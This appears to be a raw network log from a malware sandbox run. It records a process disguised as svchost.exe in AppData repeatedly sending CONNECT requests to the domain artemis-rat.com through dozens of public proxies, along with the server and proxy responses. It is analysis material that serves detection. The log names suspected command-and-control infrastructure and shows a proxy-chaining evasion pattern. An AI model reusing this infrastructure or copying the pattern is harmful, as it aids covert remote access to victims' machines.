Mar 9, 2024 13:14:28.038696051 CET	408	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 09 Mar 2024 12:14:27 GMT Server: Apache Allow: OPTIONS,HEAD,GET,POST Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1835	192.168.2.5	55407	43.155.130.182	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.737664938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1836	192.168.2.5	55569	104.19.83.128	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.739976883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.894586086 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1837	192.168.2.5	55409	120.76.42.209	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.758646011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1838	192.168.2.5	55743	43.153.175.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.765547037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1839	192.168.2.5	55745	43.153.175.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.767406940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1840	192.168.2.5	55746	43.153.175.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.771401882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1841	192.168.2.5	55474	155.185.15.56	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.802715063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.247133017 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1842	192.168.2.5	55494	27.96.235.171	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.802715063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1843	192.168.2.5	55481	110.12.211.140	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.803303003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1844	192.168.2.5	55449	185.104.112.62	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.810203075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.153601885 CET	799	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:27 GMT Server: Apache/2.4.56 (Debian) Content-Length: 607 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1845	192.168.2.5	55543	184.178.172.5	15303	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.818404913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1846	192.168.2.5	55478	185.158.114.14	25697	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.820615053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1847	192.168.2.5	55500	80.13.43.193	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.825504065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.567709923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.564310074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.380615950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.020591021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1848	192.168.2.5	55614	104.16.104.12	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.829618931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.983956099 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1849	192.168.2.5	55503	62.171.169.37	58402	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.830910921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.504956007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1850	192.168.2.5	55436	103.49.202.250	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.832490921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1851	192.168.2.5	55645	34.49.208.221	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.832775116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1852	192.168.2.5	55657	172.67.181.32	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.833797932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.988305092 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1853	192.168.2.5	55426	206.189.145.23	49614	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.844893932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.551817894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1854	192.168.2.5	55444	119.3.215.41	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.845253944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1855	192.168.2.5	55587	94.131.63.120	58378	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.845338106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1856	192.168.2.5	55655	104.25.167.88	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.848512888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.003122091 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1857	192.168.2.5	55680	104.19.85.214	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.865519047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.019921064 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1858	192.168.2.5	55514	45.138.87.238	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.865519047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1859	192.168.2.5	55565	18.134.236.231	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.874474049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.164439917 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1860	192.168.2.5	55570	95.164.89.123	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.886445045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1861	192.168.2.5	55694	162.214.225.223	49806	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.892256021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.364319086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.911248922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.146023989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.333688974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.537034035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833682060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1862	192.168.2.5	55594	198.105.111.15	6693	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.894572020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
